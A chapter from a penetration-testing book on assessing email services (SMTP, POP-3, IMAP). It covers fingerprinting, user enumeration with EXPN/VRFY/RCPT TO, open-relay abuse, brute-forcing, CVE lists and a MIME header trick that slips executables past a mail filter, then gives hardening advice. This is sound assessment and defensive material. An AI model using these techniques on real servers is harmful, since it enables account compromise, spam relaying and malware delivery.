Email services serve and relay email messages across the Internet and private networks. Due to the nature of these services, channels between the Internet and corporate network space are opened, which determined attackers abuse to compromise internal networks. This chapter defines a strategy for assessing email services, through accurate service identification, enumeration of enabled options, and testing for known issues.
Common ports used for email delivery and collection through SMTP, POP-2, POP-3, and IMAP are as follows:
smtp 25/tcp pop2 109/tcp pop3 110/tcp imap2 143/tcp submission 587/tcp
SSL-wrapped versions of these mail services are often found running on the following ports:
smtps 465/tcp imaps 993/tcp pop3s 995/tcp
An SSL tunnel must first be established (using a tool such as stunnel) to assess these services. Then, standard assessment tools can be used through the SSL tunnel to test the services.
Most organizations with an Internet presence use email to communicate and to do business. Simple Mail Transfer Protocol (SMTP) servers provide email transport via software packages such as Sendmail, Microsoft Exchange, Lotus Domino, and Postfix. Here I discuss the techniques used to identify and exploit SMTP services.
Accurate identification of the SMTP service enables you to make sound decisions and efficiently assess the target system. Two tools in particular perform a number of tests to ascertain the SMTP service in use:
smtpmap (http://freshmeat.net/projects/smtpmap/) |
smtpscan (http://www.greyhats.org/outils/smtpscan/smtpscan-0.2.tar.gz) |
Both tools are launched from Unix-like platforms. Example 11-1 shows the smtpmap tool in use, identifying the mail service on mail.trustmatta.com as Lotus Domino 5.0.9a.
$ smtpmap mail.trustmatta.com
smtp-map 0.8
Scanning mail.trustmatta.com ( [ 192.168.0.1 ] mail )
100 % done scan
According to configuration the server matches the following :
Version Probability
Lotus Domino Server 5.0.9a 100 %
Microsoft MAIL Service, Version: 5.5.1877.197.1 90.2412 %
Microsoft MAIL Service, Version: 5.0.2195.2966 87.6661 %
According to RFC the server matches the following :
Version Probability
Lotus Domino Server 5.0.9a 100 %
AnalogX Proxy 4.10 85.4869 %
Sendmail 8.10.1 76.1912 %
Overall Fingerprinting the server matches the following :
Version Probability
Lotus Domino Server 5.0.9a 100 %
Exim 4.04 67.7031 %
Exim 4.10 (without auth) 66.7393 %
The smtpscan tool analyzes slightly different aspects of the SMTP service, predicting that the same SMTP service is Lotus Domino 5.0.8, as shown in Example 11-2.
$ smtpscan mail.trustmatta.com
smtpscan version 0.1
Scanning mail.trustmatta.com (192.168.0.1) port 25
15 tests available
77 fingerprints in the database
...............
Result --
250:501:501:250:501:250:250:214:252:252:502:250:250:250:250
SMTP server corresponding :
- Lotus Domino Release 5.0.8
Most of the time an accurate SMTP service banner is presented, so deep analysis isn’t required. Example 11-3 shows that the mail server is running Lotus Domino version 6 beta.
A number of exploitable issues in SMTP services such as
Microsoft Exchange depend on support for certain Extended SMTP (ESMTP) features. These
subsystems and features are enumerated by issuing an EHLO
command upon connecting to the target
SMTP server, as shown in Example 11-4.
$telnet 192.168.0.104
Trying 192.168.0.104... Connected to 192.168.0.104. Escape character is '^]'. 220 uranus.local Microsoft ESMTP MAIL Service, Version: 6.0.3790.1830 ready at Wed, 27 Jun 2007 21:38:52 +0200EHLO world
250-uranus.local Hello [192.168.0.15] 250-TURN 250-SIZE 250-ETRN 250-PIPELINING 250-DSN 250-ENHANCEDSTATUSCODES 250-8bitmime 250-BINARYMIME 250-CHUNKING 250-VRFY 250-X-EXPS GSSAPI NTLM 250-AUTH GSSAPI NTLM 250-X-LINK2STATE 250-XEXCH50 250 OKQUIT
221 2.0.0 uranus.local Service closing transmission channel
You can find details of Extended SMTP features online at http://en.wikipedia.org/wiki/smtp_extension.
Upon identifying an SMTP server that support authentication
(AUTH
) methods, as shown in Example 11-5, we can perform
a brute-force password grinding attack to compromise valid
credentials.
$telnet mail.example.org 25
Trying 192.168.0.25... Connected to 192.168.0.25. Escape character is '^]'. 220 mail.example.org ESMTPEHLO world
250-mail.example.org 250-AUTH LOGIN CRAM-MD5 PLAIN 250-AUTH=LOGIN CRAM-MD5 PLAIN 250-STARTTLS 250-PIPELINING 250 8BITMIME
The SMTP server at mail.example.org supports three very common authentication types, as follows:
LOGIN
(plain text
authentication using base64 encoding)
PLAIN
(variant plain text
authentication using base64 encoding)
CRAM-MD5
[MD5 shared
secret authentication (RFC 2195)]
The LOGIN
authentication
mechanism can be attacked using THC Hydra using the smtp-auth
command-line option to perform
brute-force password grinding for known user accounts. Other less
common SMTP authentication mechanisms, supported by other mail
servers, include:
DIGEST-MD5
(HTTP digest
compatible challenge-response scheme [RFC 2831])
GSSAPI
(Kerberos V
authentication via the GSSAPI)
NTLM
(Microsoft NT LAN Manager authentication [http://curl.haxx.se/rfc/ntlm.html])
OTP
(one-time password mechanism [RFC
2444])
Unfortunately, publicly available brute-force password grinding tools don’t exist for these authentication mechanisms at this time. Deeper technical discussion of various authentication mechanisms can be undertaken through reviewing the respective RFC documents and browsing Wikipedia.
If NTLM
authentication is
supported, LSASS overflows (CVE-2003-0818 and CVE-2003-0533) can be
launched to execute arbitrary code server-side. At the time of this
writing, neither CORE IMPACT nor MSF support LSASS attacks through
SMTP in this way, but Immunity CANVAS has an exploit for
CVE-2003-0818 through SMTP, as shown here:
$ ./exploits/asn1/asn1.py
Available versions:
0 : Autoversioning N/A
1 : Exploit LSASS.EXE through SMB (use default, port: 445)
2 : Exploit LSASS.EXE through IIS (use default, port: 80)
3 : Exploit LSASS.EXE through IIS HTTPS (use default, port: 443)
4 : Exploit LSASS.EXE through NETBIOS (use default, port: 139)
5 : Exploit LSASS.EXE through EXCHANGE (use default, port: 25, unstable)
Poorly configured SMTP services are used to relay unsolicited email, in much the same way as open web proxy servers. Example 11-6 shows a poorly configured Microsoft Exchange server being abused by an attacker to relay email. Increasingly, open SMTP relays exist through the use of weak passwords, which are brute-forced using the mechanisms discussed in the previous section.
$telnet mail.example.org 25
Trying 192.168.0.25... Connected to 192.168.0.25. Escape character is '^]'. 220 mail.example.org Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Sun, 5 Oct 2003 18:50:59 +0100HELO
250 mail.example.org Hello [192.168.0.1]MAIL FROM: [email protected]
250 2.1.0 [email protected] OKRCPT TO: [email protected]
250 2.1.5 [email protected]" CLASS="URL">[email protected]DATA
354 Start mail input; end with <CRLF>.<CRLF>This is a spam test! .
250 2.6.0 <[email protected]> Queued mail for deliveryQUIT
Most systems respond to a RCPT
TO:
request in the following manner if you attempt to relay
unsolicited email through them:
RCPT TO: [email protected]
550 5.7.1 Unable to relay for [email protected]
Microsoft KB article 324958 (http://support.microsoft.com/?kbid=324958) describes how to secure open SMTP relays when using Microsoft Exchange.
Most Unix-based systems run Sendmail, including Linux, Solaris,
OpenBSD, and others. Sendmail is particularly vulnerable to
information leak attacks in which local account usernames can be
extracted, and also process manipulation attacks in which Sendmail
functions such as prescan( )
are
abused to execute arbitrary code.
If the Sendmail banner is obfuscated or modified, the true
version of Sendmail can usually be ascertained by issuing a HELP
command, as shown in Example 11-7; in this case
it reveals that the server is running Sun Microsystems Sendmail
8.9.3.
$telnet mx4.sun.com 25
Trying 192.18.42.14... Connected to nwkea-mail-2.sun.com. Escape character is '^]'. 220 nwkea-mail-2.sun.com ESMTP Sendmail ready at Tue, 7 Jan 2003 02:25:20 −0800 (PST)HELO world
250 nwkea-mail-2.sun.com Hello no-dns-yet.demon.co.uk [62.49.20.20] (may be forged), pleased to meet youHELP
214-This is Sendmail version 8.9.3+Sun 214-Commands: 214- HELO MAIL RCPT DATA RSET 214- NOOP QUIT HELP VRFY EXPN 214-For more info use "HELP <topic>". 214-smtp 214-To report bugs in the implementation contact Sun Microsystems 214-Technical Support. 214-For local information contact postmaster at this site. 214 End of HELP info
Valid local user account details can be enumerated by issuing
EXPN
, VRFY
, or RCPT
TO:
commands, as shown in the following examples.
The Sendmail EXPN
command
is historically used to expand details for a given email address,
as shown in Example 11-8.
$telnet 10.0.10.11 25
Trying 10.0.10.11... Connected to 10.0.10.11. Escape character is '^]'. 220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan 2003 03:19:58 −0700 (MST)HELO world
250 mail2 Hello onyx [192.168.0.252] (may be forged), pleased to meet youEXPN test
550 5.1.1 test... User unknownEXPN root
250 2.1.5 <[email protected]>EXPN sshd
250 2.1.5 sshd privsep <sshd@mail2>
By analyzing the responses to these EXPN
commands, I ascertain that the
test
user account doesn’t
exist, mail for root is forwarded to
[email protected], and an sshd
user account is allocated for
privilege separation (privsep
)
purposes.
The Sendmail VRFY
command
is typically used to verify that a given SMTP email address is
valid. I can abuse this feature to enumerate valid local user
accounts, as detailed in Example 11-9.
$telnet 10.0.10.11 25
Trying 10.0.10.11... Connected to 10.0.10.11. Escape character is '^]'. 220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan 2003 03:19:58 −0700 (MST)HELO world
250 mail2 Hello onyx [192.168.0.252] (may be forged), pleased to meet youVRFY test
550 5.1.1 test... User unknownVRFY chris
250 2.1.5 Chris McNab <chris@mail2>
The RCPT TO:
technique is
extremely effective at enumerating local user accounts on most
Sendmail servers. Many security-conscious network administrators
ensure that EXPN
and VRFY
commands don’t return user
information, but RCPT TO:
enumeration takes advantage of a vulnerability deep within
Sendmail (one that isn’t easily removed). Example 11-10 shows standard
HELO
and MAIL FROM:
commands being issued, along
with a plethora of RCPT TO:
commands to enumerate local users.
$telnet 10.0.10.11 25
Trying 10.0.10.11... Connected to 10.0.10.11. Escape character is '^]'. 220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan 2003 03:19:58 −0700 (MST)HELO world
250 mail2 Hello onyx [192.168.0.252] (may be forged), pleased to meet youMAIL FROM:[email protected]
250 2.1.0 [email protected]... Sender okRCPT TO:test
550 5.1.1 test... User unknownRCPT TO:admin
550 5.1.1 admin... User unknownRCPT TO:chris
250 2.1.5 chris... Recipient ok
Even Sendmail services protected by a firewall SMTP proxy
(such as the SMTP fixup functionality within Cisco PIX) are
vulnerable to the RCPT TO:
attack. Example 11-11
demonstrates how suspicious commands such as EXPN
, VRFY
, and HELP
are filtered, but RCPT TO:
enumeration is still
possible.
$telnet 10.0.10.10 25
Trying 10.0.10.10... Connected to 10.0.10.10. Escape character is '^]'. 220 ************************0*0*0*0*0*0*******2******2002********0HELO world
250 mailserv.trustmatta.com Hello onyx [192.168.0.252], pleased to meet youEXPN test
500 5.5.1 Command unrecognized: "XXXX test"VRFY test
500 5.5.1 Command unrecognized: "XXXX test"HELP
500 5.5.1 Command unrecognized: "XXXX"MAIL FROM:[email protected]
250 2.1.0 [email protected]... Sender okRCPT TO:test
550 5.1.1 test... User unknownRCPT TO:chris
250 2.1.5 chris... Recipient okRCPT TO:nick
250 2.1.5 nick... Recipient ok
Both RCPT TO:
and VRFY
user enumeration attacks can be
automatically launched from the Brutus brute-force utility available
from http://www.hoobie.net/brutus/. The Brutus
program uses plug-ins known as Brutus
Application Definition (BAD) files, and the following BAD
files allow you to perform user enumeration attacks:
http://www.hoobie.net/brutus/smtp_vrfy_user.bad |
http://www.hoobie.net/brutus/smtp_rcpt_user.bad |
mailbrute is another utility that can enumerate valid user accounts through this technique. The tool, which is available from http://examples.oreilly.com/networksa/tools/mailbrute.c, can be compiled and run from any Unix-like environment.
Over the years, plenty of remote vulnerabilities have been found in Sendmail. At the time of this writing, the MITRE CVE list details the following serious vulnerabilities in Sendmail (not including denial-of-service or locally exploitable issues), as shown in Table 11-1.
Date | Notes | |
CVE-2006-0058 | 22/03/2006 | Sendmail 8.13.5 signal handler race condition resulting in arbitrary code execution. |
CVE-2004-0833 | 27/09/2004 | Sendmail 8.12.3 Debian 3.0 sasl configuration creates SMTP open relay through default account settings. |
CVE-2003-0694 | 17/09/2003 | The prescan( ) function in Sendmail 8.12.9 allows remote attackers to execute arbitrary code. |
CVE-2003-0161 | 29/03/2003 | The prescan( ) function in Sendmail before 8.12.9 doesn’t properly handle certain conversions from char and int types, causing denial of service or possible execution of arbitrary code. |
CVE-2002-1337 | 03/03/2003 | Buffer overflow in Sendmail 8.12.7 allows remote attackers to execute arbitrary code via certain formatted address fields, as processed by the crackaddr( ) function of headers.c. |
CVE-2002-0906 | 28/06/2002 | Sendmail 8.12.4 and earlier, if running in a nondefault configuration, can be compromised by an attacker using an authoritative DNS server to provide a malformed TXT record to the mail server upon connecting. |
CVE-1999-1506 | 29/01/1990 | Vulnerability in SMI Sendmail 4.0 and earlier, on SunOS up to 4.0.3, allows remote bin access. |
CVE-1999-0206 | 08/10/1996 | MIME overflow in Sendmail 8.8.0 and 8.8.1. |
CVE-1999-0204 | 23/02/1995 | Sendmail 8.6.9 remote ident overflow. |
CVE-1999-0163 | Unknown | In older versions of Sendmail, an attacker could use a pipe character to execute root commands. |
CVE-1999-0047 | 01/01/1997 | MIME overflow in Sendmail 8.8.3 and 8.8.4. |
Exploit scripts for these vulnerabilities are publicly
available from archive sites such as Packet Storm (http://www.packetstormsecurity.org). At the time of
this writing, neither MSF nor Immunity CANVAS support any of these
Sendmail issues. CORE IMPACT supports CVE-2002-1337 (Sendmail
8.12.7 crackaddr( )
overflow).
A number of serious remotely exploitable issues have been identified in the Microsoft Exchange SMTP service over the last few years. A number of zero-day denial-of-service issues also exist in Microsoft Exchange at the time of this writing, one of which is found in the Argeniss exploit pack for Immunity CANVAS. In light of this, it is not advisable to run the service exposed to the public Internet. Table 11-2 lists remotely exploitable issues as found in MITRE CVE at the time of this writing.
Date | Notes | |
CVE-2007-0213 | 08/05/2007 | Exchange Server 2007 base64-encoded MIME message overflow. |
CVE-2006-0027 | 09/05/2006 | Exchange Server 2003 SP2 message calendar (iCal) attachment heap overflow. |
CVE-2006-0002 | 10/01/2006 | Exchange Server 2000 SP3 TNEF MIME attachment overflow. |
CVE-2005-0560 | 12/04/2005 | Exchange Server 2003 X-LINK2STATE command overflow. |
CVE-2005-0044 | 08/02/2005 | Exchange Server 2003 OLE data input validation vulnerability. |
CVE-2004-0840 | 12/10/2004 | Windows Server 2003 and Exchange 2003 SMTP engine DNS response overflow. |
CVE-2003-0714 | 15/10/2003 | Exchange Server 2000 allows remote attackers to execute arbitrary code via a crafted XEXCH50 request. |
CVE-2002-0698 | 25/07/2002 | Exchange Server 5.5 allows remote attackers to execute arbitrary code via an EHLO request from a system with a long name as obtained through a reverse DNS lookup, triggering a buffer overflow. |
CVE-2002-0055 | 27/02/2002 | SMTP service in Windows 2000, Windows XP Professional, and Exchange Server 2000 malformed BDAT command denial-of-service vulnerability. |
CVE-2002-0054 | 27/02/2002 | SMTP service in Windows 2000 and Exchange Server 5.5 allows mail relay through a null AUTH command. |
CVE-2000-1006 | 31/10/2000 | Exchange Server 5.5 malformed MIME header denial-of-service vulnerability. |
CVE-1999-1043 | 24/07/1998 | Exchange Server 5.5 malformed SMTP data denial-of-service vulnerability. |
CVE-1999-0945 | 24/07/1998 | Exchange Server 5.5 AUTH and AUTHINFO denial-of-service vulnerability. |
CVE-1999-0682 | 06/08/1999 | Exchange Server 5.5 allows a remote attacker to relay email using encapsulated SMTP addresses. |
CVE-1999-0284 | 01/01/1998 | Exchange Server 5.0 HELO denial-of-service bug. |
Exploit scripts for these vulnerabilities are publicly available from archive sites such as Packet Storm (http://www.packetstormsecurity.org). At the time of this writing, MSF only supports CVE-2003-0714 (XEXCH50 overflow). Immunity CANVAS supports CVE-2003-0714 and CVE-2005-0560 (X-LINK2STATE overflow), and CORE IMPACT supports CVE-2003-0714, CVE-2005-0560, and CVE-2006-0027 (iCal attachment heap overflow).
GLEG VulnDisco doesn’t cover any Microsoft Exchange Server issues at this time, but the Argeniss 0day ultimate exploits pack contains a zero-day, unpatched, DoS exploit for Exchange Server 2003 and a DoS exploit for a known bug in Exchange Server 2000 (CVE-2007-0213).
Many organizations run inbound SMTP relay servers that can scrub email to detect and remove viruses, spam, and other adverse material before forwarding the email message to the internal network. These services can be circumvented and bypassed in some cases, as discussed next.
In 2000, I identified a serious flaw in Clearswift MAILsweeper 4.2 that used malformed MIME headers to relay viruses without being quarantined. Since then, other security issues have been identified within MAILsweeper that can relay viruses unchecked. Table 11-3 summarizes the issues identified in MAILsweeper as listed in the MITRE CVE list at http://cve.mitre.org.
CVE reference(s) | Date | Notes |
CVE-2006-3215 and CVE-2006-3216 | 21/06/2006 | MAILsweeper 4.3.19 character set security bypass issues |
CVE-2003-1154 | 05/11/2003 | MAILsweeper 4.3.9 zip archive processing vulnerability |
CVE-2003-0928, CVE-2003-0929, and CVE-2003-0930 | 07/08/2003 | MAILsweeper 4.3.14 multiple issues relating to processing compressed archive attachments |
CVE-2003-1330 | 03/02/2003 | MAILsweeper 4.3.6 SP1 and prior “on strip successful” filter bypass |
CVE-2003-0121 | 03/03/2003 | MAILsweeper 4.3.7 and prior MIME encapsulation filter bypass |
CVE-2001-1581 | 10/04/2001 | MAILsweeper 4.2 and prior “file blocker” filter bypass |
The malformed MIME headers issue was reported to the vendor in
February 2001 and is listed in Table 11-3 as CVE-2003-1330. The
technique was extremely simple, involving two MIME fields related to
email attachments (filename
and
name
).
Example 11-12 shows a legitimate email message and attachment generated by Outlook or any current email client, from [email protected] to [email protected] with the text/plain attachment report.txt.
From: John Smith <[email protected]> To: Mickey Mouse <[email protected]> Subject: That report Date: Thurs, 22 Feb 2001 13:38:19 −0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.23) Content-Type: multipart/mixed ; boundary="----_=_NextPart_000_02D35B68.BA121FA3" Status: RO This message is in MIME format. Since your mail reader doesn't understand this format, some or all of this message may not be legible. - ------_=_NextPart_000_02D35B68.BA121FA3 Content-Type: text/plain; charset="iso-8859-1" Mickey, Here's that report you were after. - ------_=_NextPart_000_02D35B68.BA121FA3 Content-Type: text/plain; name="report.txt" Content-Disposition: attachment; filename="report.txt" < data for the text document here > - ------_=_NextPart_000_02D35B68.BA121FA3
The vulnerability exists in the way that the MAILsweeper SMTP
relay and Outlook email clients open the report.txt file. The MAILsweeper gateway
reads the name
value (report.txt) when processing and scanning
the file for viruses and malicious code, and the Outlook client reads
the filename
value (report.txt) when opening and processing the
file on the user desktop.
Any type of malicious virus or Trojan horse program can pass
through this filter and make its way to the user desktop by modifying
the MIME name
and filename
values. To send a malicious
executable, set the name
to an
unobjectionable value that won’t be processed for virus code
(report.txt) and the filename
value to a type that won’t be
executed client-side (report.vbs), as shown here:
- ------_=_NextPart_000_02D35B68.BA121FA3 Content-Type: text/plain; name="report.txt" Content-Disposition: attachment; filename="report.vbs"
There are plenty of these issues within filtering packages such as MAILsweeper. It is therefore important that networks are set up with defense in depth to prevent known viruses from being pushed through such filters and making their way to the user desktop.
To learn more, check CVE-2002-1121 in the MITRE CVE list at http://cve.mitre.org, which relates to RFC 2046 message fragmentation and assembly. The following SMTP gateway products are susceptible to mail-fragmentation issues:
Post Office Protocol 2 and 3 (POP-2 and POP-3) are end user email services. POP-2 services are very rare nowadays, as most organizations use POP-3, which listens on TCP port 110 (or port 995 if using SSL or TLS to provide network encryption). Common POP-3 email services include Qualcomm QPOP (also known as qpopper; it runs on many Unix platforms) and the POP-3 component of Microsoft Exchange. These services are traditionally vulnerable to brute-force password grinding and process manipulation attacks.
After performing enumeration and identifying local user accounts through Sendmail and other avenues, it is trivial to perform a brute-force password grinding attack. As I’ve discussed throughout the book so far, tools such as Brutus and THC Hydra are used to perform fast brute-force password grinding attacks.
Most POP-3 services are susceptible to brute-force password grinding, for the following reasons:
They don’t pay attention to account lockout policies.
They allow a large number of login attempts before disconnecting.
They don’t log unsuccessful login attempts.
Many specific Unix-based POP-3 brute-force tools exist and can be found in the Packet Storm archive, including:
http://packetstormsecurity.org/groups/adm/adm-pop.c |
http://packetstormsecurity.org/crackers/pop_crack.tar.gz |
http://packetstormsecurity.org/crackers/hv-pop3crack.pl |
Both unauthenticated and authenticated process manipulation
attacks pose a serious threat to security. Most users who pick up
email via POP-3 shouldn’t be allowed to execute arbitrary commands on
the POP-3 server; however, they can do so via post-authentication
overflows in user commands such as LIST
, RETR
, or DELE
.
At the time of this writing, the MITRE CVE list details a handful of vulnerabilities in Qualcomm QPOP (not including denial-of-service issues), as shown in Table 11-4. Serious post-authentication vulnerabilities are also listed in Table 11-4 because they allow users to execute arbitrary code on the server.
CVE reference | Date | Notes |
CVE-2003-0143 | 10/03/2003 | QPOP 4.0.5fc1 post-authentication MDEF macro name overflow |
CVE-2001-1046 | 02/06/2001 | QPOP 4.0.2 USER command overflow |
CVE-2000-0442 | 23/05/2000 | QPOP 2.53 post-authentication EUIDL overflow |
CVE-2000-0096 | 26/01/2000 | QPOP 3.0 post-authentication LIST overflow |
CVE-1999-0822 | 29/11/1999 | QPOP 3.0 AUTH command overflow |
CVE-1999-0006 | 28/06/1998 | QPOP 2.5 PASS command overflow |
Public exploits for these issues are packaged and available at
http://examples.oreilly.com/networksa/tools/qpop-exploits.zip.
At the time of this writing, there are no public exploits for the
USER
overflow (CVE-2001-1046).
MSF, Immunity CANVAS, and CORE IMPACT have no support for QPOP
issues at this time.
At the time of this writing, no serious remotely exploitable vulnerabilities are known in the Microsoft Exchange POP-3 server. Upon scouring the MITRE CVE list, ISS X-Force database, and CERT knowledge base, no publicized bugs were found. This fact may well change over time, so it is important to check these vulnerability lists to assure the security of this service component into the future.
Internet Message Access Protocol (IMAP) services are commonly found running on TCP port 143. The IMAP protocol is much like POP-3; a user authenticates with a plaintext network service and can then collect and manage her email.
Most accessible IMAP servers on the Internet today run the Washington University IMAP service (known as both UW IMAP and WU-IMAP, available from http://www.washington.edu/imap/), along with Courier IMAP (http://www.courier-mta.org/imap/) and Microsoft Exchange IMAP.
As with many other simple plaintext protocols (Telnet, FTP, POP-3, etc.), Brutus and THC Hydra do a good job of brute-forcing user account passwords from both Unix-based and Windows environments. As mentioned earlier, they can be downloaded from:
http://www.hoobie.net/brutus/brutus-download.html |
http://www.thc.org/releases.php |
IMAP services, like POP-3, are notoriously susceptible to brute-force password-grinding attacks, as they often do not pay attention to account lockout policies and often do not log failed authentication attempts.
Table 11-5 lists remotely exploitable UW IMAP and Courier IMAP vulnerabilities, along with MITRE CVE references. At this time, no significant remotely exploitable issues exist in Microsoft Exchange IMAP, according to a number of sources. A number of other issues relate to many other third-party IMAP services that are less common and can be found by searching MITRE CVE manually.
CVE reference | Date | Notes |
CVE-2005-2933 | 04/10/2005 | UW IMAP 2004f mailbox name overflow |
CVE-2005-0198 | 28/01/2005 | UW IMAP 2004b CRAM-MD5 authentication bypass |
CVE-2004-0777 | 18/08/2004 | Courier IMAP 2.2.1 authentication logging format string bug |
CVE-2004-0224 | 11/03/2004 | Courier IMAP 2.x unicode character conversion overflow |
CVE-2002-0379 | 10/05/2002 | UW IMAP 2000c post-authentication BODY command overflow |
CVE-2000-0284 | 16/04/2000 | UW IMAP 4.7 (IMAP4rev1 12.264) post-authentication LIST command overflow |
CVE-1999-0042 | 02/03/1997 | UW IMAP 4.1beta LOGIN command overflow |
CVE-1999-0005 | 17/07/1998 | UW IMAP 4 (IMAP4rev1 10.234) AUTHENTICATE command overflow |
The following public exploit scripts are available for a number of these vulnerabilities in the accompanying tools archive for this book (http://examples.oreilly.com/networksa/tools/). These exploit scripts are detailed in Table 11-6.
CVE reference | UW IMAP version | Target platform(s) | Exploit script |
CVE-1999-0042 | IMAP4rev1 v10.164 | Linux & BSD | imaps.tar.gz |
CVE-1999-0005 | IMAP4rev1 v10.223 | Linux | imapd-ex.c |
CVE-1999-0005 | IMAP4rev1 v10.223 | Linux | imapx.c |
CVE-1999-0005 | IMAP4rev1 v10.223 | Linux | imap.c |
CVE-1999-0005 | IMAP4rev1 v10.205 | Solaris (x86) | solx86-imapd.c |
The original BugTraq posting and technical details relating to CVE-1999-0005, including the exploit, are available from http://packetstormsecurity.org/new-exploits/imapd4.txt.
CORE IMPACT has no support for UW IMAP or Courier IMAP issues at this time, but it has support for a number of Cyrus IMAP, Lotus Domino IMAP, and MDaemon IMAP issues. Immunity CANVAS also has no UW IMAP or Courier IMAP support, but it has exploit modules for a number of third-party IMAP packages, including MDaemon IMAP and Ipswitch IMAIL IMAP.
MSF supports a very large number of IMAP issues in its stable branch, which can be reviewed at http://framework.metasploit.com/exploits/list.
The following countermeasures should be considered when hardening email services:
Don’t run Sendmail or Microsoft Exchange in high-security environments because the software contains many bugs and is heavily bloated. Sound Unix-based alternatives include qmail (http://www.qmail.org) and exim (http://www.exim.org), neither of which is as complex or susceptible to Internet-based attacks. It is advisable to use firewall-secure SMTP services and proxies or dedicated mail-scrubbing appliances to process Internet-based SMTP traffic before passing it onto Sendmail or Microsoft Exchange servers.
To minimize the impact of a user enumeration and password-grinding attack, ensure that all user accounts on SMTP and POP-3 mail servers have strong passwords. Ideally, SMTP servers shouldn’t also run remote maintenance or email pickup services to the public Internet.
If you do offer public POP-3 or IMAP mail services, investigate their resilience from brute-force attack, including logging provisions and whether an account lockout policy can be deployed.
Using SSL-wrapped versions of POP-3 and IMAP services will minimize the risk of plaintext user account password details from being sniffed. Plaintext services are open to determined attack, so you need either SSL or VPN client software to protect both passwords and the email data sent from point to point.
Ensure that inbound commercial SMTP relay and anti-virus scanners (such as Clearswift MAILsweeper and InterScan VirusWall) are patched and maintained to prevent circumvention attacks from being effective.
18.189.193.84